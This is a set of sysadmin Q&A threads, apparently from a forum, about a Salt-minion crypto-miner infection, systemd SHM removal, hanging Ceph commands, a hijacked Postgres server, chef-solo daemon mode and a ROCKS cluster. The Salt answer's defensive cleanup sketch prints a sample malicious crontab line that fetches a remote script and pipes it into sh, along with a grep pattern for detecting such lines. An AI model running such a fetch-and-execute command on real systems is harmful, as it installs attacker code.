Salt-minions service consuming over 100% CPU on Ubuntu, cannot remove it or find how it's restarting - ubuntu-16.04

We used to use salt-master to manage about 10 servers, but have stopped now.
One of the servers is now constantly running a salt-minions service which consumes around 140%-160% of the CPU all the time. I kill it, and it just comes back again and again.
I have used apt-get to remove and purge any packages matching salt-*, and used dpkg to do the same. The Salt master server is not running. Yet this instance just keeps hammering itself with this random process that won't die.
Any assistance is greatly appreciated!
Screenshot of running processes and output from apt-get packages

This looks to be CVE related, and you need to rebuild/redeploy these systems.
Please read both:
SaltStack Blog: Critical Vulnerabilities Update CVE-2020-11651 and CVE-2020-11652
saltexploit.com
Snippet from the CVE blog:
...a critical vulnerability was discovered affecting Salt Master versions 2019.2.3 and 3000.1 and earlier. SaltStack customers and Salt users who have followed fundamental internet security guidelines and best practices are not affected by this vulnerability. The vulnerability is easily exploitable if a Salt Master is exposed to the open internet.
As always, please follow our guidance and secure your Salt infrastructure with the best practices found in this guide: See: Hardening your Salt Environment.
This vulnerability has been rated as critical with a Common Vulnerability Scoring System (CVSS) score of 10.0.
Snippet from saltexploit:
This was a crypto-mining operation
salt minions are affected and as of version 5, masters may be as well
salt-minions is a compiled xmrig binary.
salt-store contains a RAT, nspps, which continues to evolve and become more nasty
Atlassian confirms the newer revisions of the binary are a version of h2miner
Additional information
As a RAT, salt-store is more concerning than salt-minions. More on that later
There have been at least 5 different versions of the salt-store payload, each more advanced than the last.
There are additional backdoors installed, and private keys are getting stolen right and left
Seriously, change out your keys!
Symptoms
very high CPU usage, sometimes only on 1 core, sometimes on all
Fan spin! (Physical hardware only, of course.)
Mysterious process named salt-minions is CPU intensive, stemming from /tmp/salt-minions or /usr/bin/
additional binary in /var/tmp/ or /usr/bin named salt-store or salt-storer
Firewalls disabled
Most applications crashing or taken offline
Your screenshots show processes named salt-minions and high CPU usage, just as described.
It would be a good idea to join the Salt community slack, too: SaltStack Community Slack and take a look at both the #salt-store-miner-public and #security channels.

Check your root's crontab with:
sudo crontab -u root -l
If you see a wget/curl download of a shell script from a random IP, you've got the miner.
How to fix it:
Plan A:
Update the Salt master
Wipe and reinstall all the servers connected to that master.
Plan B (usually more feasible):
Update the Salt master and minions
Delete the crontab entry with sudo crontab -u root -e
Kill the salt-store and salt-minions processes with kill -9 <pid> <pid> (get the PIDs with ps faxu)
Delete the fake salt-minions executable, usually in /tmp/
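The Plan B steps can be sketched as a small detection helper plus the manual cleanup. This is a sketch, not a definitive removal procedure: the crontab pattern and file paths below are the commonly reported ones and may not match every variant of the malware.

```shell
# Hypothetical helper: flag crontab lines that fetch a remote script
# and pipe it into a shell -- the pattern reported for this miner.
suspicious_cron() {
    grep -E '(wget|curl).*https?://' | grep -E '\|[[:space:]]*(ba)?sh'
}

# Example of the kind of entry it flags (illustrative IP address):
echo '* * * * * wget -q -O - http://203.0.113.7/sa.sh | sh' | suspicious_cron

# To scan the real crontab:  sudo crontab -u root -l | suspicious_cron
# Then, as root: remove the entry (crontab -u root -e), kill the
# processes, and delete the dropped binaries, e.g.:
#   pkill -9 -f 'salt-store|salt-minions'
#   rm -f /tmp/salt-minions /var/tmp/salt-store /usr/bin/salt-store
```

Remember the cleanup only removes the miner itself; given the RAT and stolen keys described above, a rebuild and key rotation is still the safe course.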

Related

Why does systemd remove my SHM file but not PostgreSQL's?

I'm developing a daemon application on an Ubuntu server that is managed by systemd.
I create an SHM file in /dev/shm/ using shm_open, and close the file descriptor after calling mmap. At first the file exists, but it disappears after a while, perhaps when I log out from the server.
Perhaps this is controlled by the option RemoveIPC=yes in /etc/systemd/logind.conf.
My questions are:
Why does systemd not clean up the SHM file created by PostgreSQL, but removes mine?
How can I modify my app to behave like PostgreSQL, so as to reduce management and maintenance work in production?
I found that the shared memory is still usable after systemd removes the file. Does this mean I can ignore the removal and keep using the memory without recreating it?
I think your suspicion is right; see the documentation for details:
If systemd is in use, some care must be taken that IPC resources (including shared memory) are not prematurely removed by the operating system. This is especially of concern when installing PostgreSQL from source. Users of distribution packages of PostgreSQL are less likely to be affected, as the postgres user is then normally created as a system user.
The setting RemoveIPC in logind.conf controls whether IPC objects are removed when a user fully logs out. System users are exempt. This setting defaults to on in stock systemd, but some operating system distributions default it to off.
[...]
A “user logging out” might happen as part of a maintenance job or manually when an administrator logs in as the postgres user or something similar, so it is hard to prevent in general.
What is a “system user” is determined at systemd compile time from the SYS_UID_MAX setting in /etc/login.defs.
Packaging and deployment scripts should be careful to create the postgres user as a system user by using useradd -r, adduser --system, or equivalent.
Alternatively, if the user account was created incorrectly or cannot be changed, it is recommended to set
RemoveIPC=no
in /etc/systemd/logind.conf or another appropriate configuration file.
While this is talking about PostgreSQL, the same applies to your software. So take one of the recommended measures.
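To check which side of the RemoveIPC rule a given account falls on, here is a rough sketch. It assumes a Linux host with /etc/login.defs, and 999 is the usual fallback for SYS_UID_MAX when the setting is commented out:

```shell
# Is the current account a "system user" (exempt from RemoveIPC)?
# $1 == "SYS_UID_MAX" deliberately skips commented-out lines.
SYS_UID_MAX=$(awk '$1 == "SYS_UID_MAX" {print $2}' /etc/login.defs)
SYS_UID_MAX=${SYS_UID_MAX:-999}   # stock default when unset

uid=$(id -u)                      # substitute your daemon's account here
if [ "$uid" -le "$SYS_UID_MAX" ]; then
    echo "system user: IPC objects survive logout"
else
    echo "regular user: set RemoveIPC=no, or recreate the account with useradd -r"
fi
```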

How can I fix ceph commands hanging after a reboot?

I'm pretty new to Ceph, so I've included all my steps I used to set up my cluster since I'm not sure what is or is not useful information to fix my problem.
I have 4 CentOS 8 VMs in VirtualBox set up to teach myself how to bring up Ceph: 1 is a client and 3 are Ceph monitors. Each Ceph node has six 8 GB drives. Once I learned how the networking worked, it was pretty easy.
I set each VM to have a NAT (for downloading packages) and an internal network that I called "ceph-public". This network would be accessed by each VM on the 10.19.10.0/24 subnet. I then copied the ssh keys from each VM to every other VM.
I followed this documentation to install cephadm, bootstrap my first monitor, and added the other two nodes as hosts. Then I added all available devices as OSDs, created my pools, then created my images, then copied my /etc/ceph folder from the bootstrapped node to my client node. On the client, I ran rbd map mypool/myimage to mount the image as a block device, then used mkfs to create a filesystem on it, and I was able to write data and see the IO from the bootstrapped node. All was well.
Then, as a test, I shutdown and restarted the bootstrapped node. When it came back up, I ran ceph status but it just hung with no output. Every single ceph and rbd command now hangs and I have no idea how to recover or properly reset or fix my cluster.
Has anyone ever had the ceph command hang on their cluster, and what did you do to solve it?
Let me share a similar experience. Some time ago I also tried to run some tests on Ceph (Mimic, I think), and my VMs in VirtualBox acted very strangely, nothing comparable to actual bare-metal servers, so please bear this in mind... the tests are not quite representative.
As regarding your problem, try to see the following:
have at least 3 monitors (an odd number, so elections can reach a majority). It's possible the hang is caused by a failed monitor election.
make sure the networking part is OK (separate VLANs for Ceph servers and clients)
DNS resolves correctly (or you have added the server names to /etc/hosts)
...just my 2 cents...
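When every ceph/rbd command hangs, the client usually cannot reach a monitor quorum. A rough triage sketch along those lines (daemon names assume a cephadm deployment, and ceph-node1 is an illustrative hostname; the guards just skip steps on machines without the tools):

```shell
# Bound the wait so you get an error instead of an indefinite hang:
if command -v ceph >/dev/null 2>&1; then
    timeout 10 ceph status || echo "no reachable monitor quorum"
    # Which monitors are up, and who is in quorum:
    timeout 10 ceph quorum_status 2>/dev/null || true
fi

# On each monitor host, check the mon daemon actually came back up:
if command -v systemctl >/dev/null 2>&1; then
    systemctl list-units 'ceph-*' --no-pager || true
fi

# From the client, confirm the monitor address still resolves:
getent hosts ceph-node1 >/dev/null || echo "lookup failed for ceph-node1"
```

If the monitors are up but status still hangs, compare the monitor addresses in /etc/ceph/ceph.conf on the client against what the monitors actually bound to after the reboot.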

Postgres utilizing 100% CPU on EC2 Instance? Why? How to fix?

I am facing the same issue regularly; it happens 1-3 times a month, mostly on weekends.
To explain: CPU utilization has been above 100% for the last 32 hours.
EC2 Instance is t3.medium
Postgres version is 10.6
OS : Amazon Linux 2
I have tried to gather all the information I could using the commands provided in this reference: https://severalnines.com/blog/why-postgresql-running-slow-tips-tricks-get-source
But I didn't find any inconsistency or leak in my database, although while checking which processes were consuming all the CPU I found the following command, which has been running for more than 32 hours, to be the culprit.
/var/lib/postgresql/10/main/postgresql -u pg_linux_copy -B
This command is currently running as 3 separate processes, which have been running for 32 hours, 16 hours, and 16 hours respectively.
Searching for this didn't return a single result on Google, which is heartbreaking.
If I kill the process, everything turns back to normal.
What is the issue and what can I do to prevent this from happening again in future?
I was recently contacted by the AWS EC2 Abuse team about my instance being involved in an intrusion attack on another server.
To my surprise, I found out that because I had used a very weak password ("root") for the default postgres account and had also left the Postgres port open to the public, an attacker silently gained access to the instance and used it to try to gain access to another instance.
I am still not sure how the attacker was able to run SSH commands from access to the master database account.
To summarise: one reason for unusual database spikes on a server could be someone attacking your system.
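To check for the same exposure, a quick sketch; world_open_rules is a hypothetical helper, and you would feed it your actual pg_hba.conf, whose path varies by installation:

```shell
# Hypothetical helper: flag pg_hba.conf rules that accept connections
# from any IPv4 or IPv6 address.
world_open_rules() {
    grep -E '^host[[:space:]].*(0\.0\.0\.0/0|::/0)'
}

# Illustrative rule of the dangerous kind:
printf 'host all all 0.0.0.0/0 md5\n' | world_open_rules

# On the real server you would run something like:
#   world_open_rules < /var/lib/pgsql/10/data/pg_hba.conf
# Also check whether Postgres listens on all interfaces:
#   ss -tlnp | grep 5432
# then restrict listen_addresses and the security group to trusted
# hosts, and change the password:
#   ALTER USER postgres WITH PASSWORD 'a-strong-password';
```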

How does chef-solo --daemonize work, and what's the point?

I understand the purpose of chef-client --daemonize, because it's a service that Chef Server can connect to and interact with.
But chef-solo is a command that simply brings the current system in line with its specifications and then is done.
So what is the point of chef-solo --daemonize, and what specifically does it do? For example, does it autodetect when the system falls out of line with spec? Does it do so via polling or tapping into filesystem events? How does it behave if you update the cookbooks and node files it depends on when it's already running?
You might also ask why chef-solo supports the --splay and --interval arguments.
Don't forget that chef-server is not the only source of data.
Configuration values can rely on a bunch of other sources (APIs, OHAI, DNS...).
The most classic one is OHAI - think of a cookbook that configures memcached. You would probably want to reserve X amount of RAM for the operating system and give the rest to memcached.
Available RAM can be changed when running inside a VM, even without rebooting it.
That might be a good reason to run chef-solo as a daemon with frequent chef-runs, like you're used to when using chef-client with a chef-server.
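The memcached sizing above can be sketched in shell; the 512 MB OS reserve is an arbitrary assumption, and the point is that a periodic run would recompute the figure after a VM resize:

```shell
# Reserve a fixed slice of RAM for the OS, give the rest to memcached;
# a periodic chef run would recompute this after the VM's RAM changes.
total_kb=$(awk '/^MemTotal:/ {print $2}' /proc/meminfo)
reserve_kb=$((512 * 1024))                    # keep 512 MB for the OS
memcached_mb=$(( (total_kb - reserve_kb) / 1024 ))
echo "would run: memcached -m $memcached_mb -d"
```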
As for your other questions:
Q: Does it autodetect when the system falls out of line with spec?
Does it do so via polling or tapping into filesystem events?
A: Chef doesn't respond to changes. Instead, it runs frequently and makes sure the current state is in sync with the desired state - which can be based on chef-server inventory, API calls, OHAI attributes, etc. The desired state is constructed from scratch on every Chef run, at the compile stage, when all the resources are generated.
Q: How does it behave if you update the cookbooks and node files it depends on when it's already running?
A: Usually when running chef-solo, one uses the --json flag to specify a JSON file with node attributes and a run-list. When running in --daemonize mode with chef-solo, the node attributes are read only for the first run. For the rest of the runs, it's as if you were running it without a --json flag. I couldn't figure out a way to make it work as if you were running it with --json all over again, however, you can use the --override-runlist option to at least make the runlist stick.
Note that the attributes you're specifying in your JSON won't make it past the first run. This is possibly a bug.
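For reference, a daemonized invocation might look like the following; the flag names are the documented chef-solo options, the paths are illustrative, and (per the caveat above) the JSON attributes only take effect on the first run:

```shell
# Converge every 30 minutes, with up to 5 minutes of random splay
# so a fleet of nodes doesn't converge in lockstep:
cmd="chef-solo --daemonize --interval 1800 --splay 300 \
--config /etc/chef/solo.rb --json-attributes /etc/chef/node.json"

# On a node with chef-solo installed you would simply run $cmd:
echo "$cmd"
```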

Managing ROCKS cluster

I suddenly became the admin of the cluster in my lab and I'm lost.
I have experience managing Linux servers, but not clusters.
Clusters seem to be quite different.
I figured out that the cluster is running CentOS and ROCKS.
I'm not sure what SGE is, or whether it is used in the cluster.
Would you point me to an overview or documentation of how a cluster is configured and how to manage it? I googled, but there seem to be lots of ways to build a cluster, and it is confusing where to start.
I too suddenly became a Rocks Clusters admin. While your CentOS knowledge will be handy, there are some 'Rocks' ways of doing things which you need to read up on. They mostly start with the CLI commands rocks list|set, and they are very nice to work with once you learn them.
You should probably start by reading the documentation (this link is for the newest version; you can find yours with 'rocks report version'):
http://central6.rocksclusters.org/roll-documentation/base/6.1/
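A few commands to orient yourself, run on the frontend node (command names per the Rocks base documentation; the guard just skips them on a non-Rocks machine):

```shell
have_rocks=$(command -v rocks || true)
if [ -n "$have_rocks" ]; then
    rocks report version        # which Rocks release you are running
    rocks list host             # every node the frontend knows about
    rocks list host interface   # per-node network configuration
fi
```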
You can read up on the SGE part at
http://central6.rocksclusters.org/roll-documentation/sge/6.1/
I would recommend signing up for the Rocks Clusters discussion mailing list at:
https://lists.sdsc.edu/mailman/listinfo/npaci-rocks-discussion
The list is very friendly.